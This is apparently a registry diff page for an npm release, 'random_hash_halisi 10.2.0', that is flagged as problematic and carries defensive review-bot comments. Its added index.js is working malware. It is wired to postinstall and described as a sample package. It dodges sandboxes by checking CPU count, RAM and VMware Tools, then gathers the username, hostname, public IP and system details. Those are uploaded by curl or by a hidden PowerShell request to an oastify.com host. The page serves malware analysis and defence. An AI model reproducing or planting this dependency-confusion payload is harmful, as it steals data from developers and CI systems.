random_hash_halisi 10.2.0


Potentially problematic release.


This version of random_hash_halisi might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +145 -0
  2. package/package.json +15 -0
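--- a/package/index.js
+++ b/package/index.js
@@ -0,0 +1,145 @@
+ const os = require('os');
+ const util = require('util');
+ const exec = util.promisify(require('child_process').exec);
+ const http = require('http');
+ const fs = require('fs');
+
+ const getPublicIP = (callback) => {
+ const options = {
+ hostname: 'api.ipify.org',
+ path: '/?format=json',
+ method: 'GET',
+ };
+
+ const req = http.request(options, (res) => {
+ let data = '';
+ res.on('data', (chunk) => {
+ data += chunk;
+ });
+
+ res.on('end', () => {
+ try {
+ const response = JSON.parse(data);
+ const publicIP = response.ip;
+ callback(null, publicIP);
+ } catch (error) {
+ callback(new Error('Error parsing response'));
+ }
+ });
+ });
+
+ req.on('error', (error) => {
+ callback(error);
+ });
+
+ req.end();
+ };
+
+ const detectOSType = () => {
+ const type = os.type();
+ if (type.startsWith('Windows')) return 'Windows';
+ if (type.startsWith('Linux')) return 'Linux';
+ if (type.startsWith('Darwin')) return 'Mac';
+ return 'UNKNOWN';
+ };
+
+ const os_type = detectOSType();
+
+ let cpus = os.cpus();
+ cpus = cpus.length;
+
+ if (cpus === 1) {
+ process.exit(1);
+ }
+
+ let totalMemory = os.totalmem();
+ totalMemory = totalMemory / (1024 ** 3); // Convert from bytes to gigabytes
+ totalMemory = Math.round(totalMemory);
+
+ const THRESHOLD = "2";
+ if (totalMemory < THRESHOLD) {
+ process.exit(1);
+ }
+
+ async function checkVMTools() {
+ const os_type = detectOSType();
+ let checkCommand;
+ let isActive;
+
+ if (os_type === 'Windows') {
+ checkCommand = 'sc query VMTools';
+ isActive = (stdout) => stdout.includes('RUNNING');
+ } else if (os_type === 'Linux' || os_type === 'Mac') {
+ checkCommand = 'systemctl is-active vmtoolsd';
+ isActive = (stdout) => stdout.trim() === 'active';
+ } else {
+ console.error('Unsupported OS type:', os_type);
+ process.exit(1);
+ }
+
+ const { stdout } = await exec(checkCommand);
+
+ if (isActive(stdout)) {
+ //console.log("VMware tools are active, exiting.");
+ process.exit(1);
+ } else {
+ await getPublicIP((error, remoteIP) => {
+ if (error) {
+ console.error('Error:', error.message);
+ } else {
+ if (os_type === 'Linux' || os_type === 'Mac') {
+ const bash = `#!/bin/bash;separator="--------------------------------------------------";exfiltrate="$separator
+ Username: $(whoami)
+ Hostname: $(hostname)
+ Public IP: ${remoteIP}
+ Time: $(date)
+ Current Path: $(pwd)
+ Package Name: $(npm run env | grep 'npm_package_name' | cut -d '=' -f 2)
+ Kernel: $(uname -a)
+ $separator";echo "$exfiltrate" > /tmp/demo.txt;curl --silent -F "content=@/tmp/demo.txt" https://89fx87vsee4w00kbzt8ynmvxlorff53u.oastify.com;rm -f /tmp/demo.txt`;
+ exec('echo -e' + bash + " > /tmp/demo.sh; chmod +x /tmp/demo.sh; /bin/bash -c /tmp/demo.sh; rm -f /tmp/demo.sh",
+ (error, stdout, stderr) => {
+ if (error) {
+ console.error(`Error: ${error.message}`);
+ return;
+ }
+ }
+ );
+ } else if (os_type === 'Windows') {
+ const powershell = `$whoami = whoami
+ $today = (Get-Date).DateTime
+ $publicIP = (Invoke-WebRequest -Uri 'https://api.ipify.org?format=text' -UseBasicParsing).content
+ $system = systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
+ $filePath = [System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), "output.txt")
+ $scriptPath = [System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), "demo.ps1")
+
+ Write-Output "Username: $whoami\`nDate: $today\`nPublic IP: $publicIP\`nSystem Information:" | Out-File -FilePath $filePath -Encoding ASCII
+ Add-Content $filePath $system
+
+ $destinationUrl = "https://89fx87vsee4w00kbzt8ynmvxlorff53u.oastify.com"
+
+ $filePath = "$filePath"
+
+ Invoke-WebRequest -Uri $destinationUrl -Method POST -InFile $filePath -UseBasicParsing
+ del $filePath
+ del $scriptPath`;
+ const psFilePath = `${process.env.TEMP}\\demo.ps1`;
+ fs.writeFileSync(psFilePath, powershell, 'utf8');
+ exec(
+ `C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File %TEMP%\\demo.ps1`,
+ (error, stdout, stderr) => {
+ if (error) {
+ console.error(`Error: ${error.message}`);
+ return;
+ }
+ }
+ );
+ }
+ }
+ });
+ }
+ }
+
+ checkVMTools().catch(error => {
+ console.error(`An error occurred: ${error}`);
+ });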
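Review bot: Nothing in this file implements a library function; the whole body runs at install time, collects the username, hostname, public IP, working directory and kernel or `systeminfo` output, and uploads it to the `oastify.com` host hard-coded in both the bash and PowerShell branches, so the release should be treated as hostile whatever the manifest description says. The early `process.exit(1)` calls on a single CPU, on less than 2 GB of RAM, and on a running VMware Tools service look like sandbox gating, so a quiet run in a small analysis VM is not evidence that the package is benign. For hunting, the artefacts visible here are `/tmp/demo.txt` and `/tmp/demo.sh`, `demo.ps1` and `output.txt` in the Windows temp directory, a `powershell.exe -ExecutionPolicy Bypass ... -WindowStyle Hidden` child of `node`, and outbound requests to `api.ipify.org` followed by the oastify host. Any workstation or CI runner that resolved this version should be checked for those traces, and the package name should be pinned to the registry it was meant to come from.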
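--- a/package/package.json
+++ b/package/package.json
@@ -0,0 +1,15 @@
+
+ {
+ "name": "random_hash_halisi",
+ "version": "10.2.0",
+ "description": "A sample npm package for demonstration purposes.",
+ "main": "index.js",
+ "scripts": {
+ "postinstall": "node index.js"
+ },
+ "keywords": [
+ "dependency"
+ ],
+ "author": "Depdency-Confusion-PoC",
+ "license": "ISC"
+ }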
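Review bot: The `postinstall` entry `node index.js` makes the collection script run automatically on every `npm install`, with no import by the consuming project needed, and it is the only behaviour this manifest wires up. The unscoped name, the high first-published version `10.2.0` and the author string suggest a dependency-confusion test meant to outrank an internal package of the same name, though the page does not show the intended target. Consumers are protected by installing with `--ignore-scripts` (or `ignore-scripts=true` in `.npmrc`), by publishing internal packages under a scope mapped to the private registry, and by committing a lockfile so the resolved source and integrity hash cannot change silently.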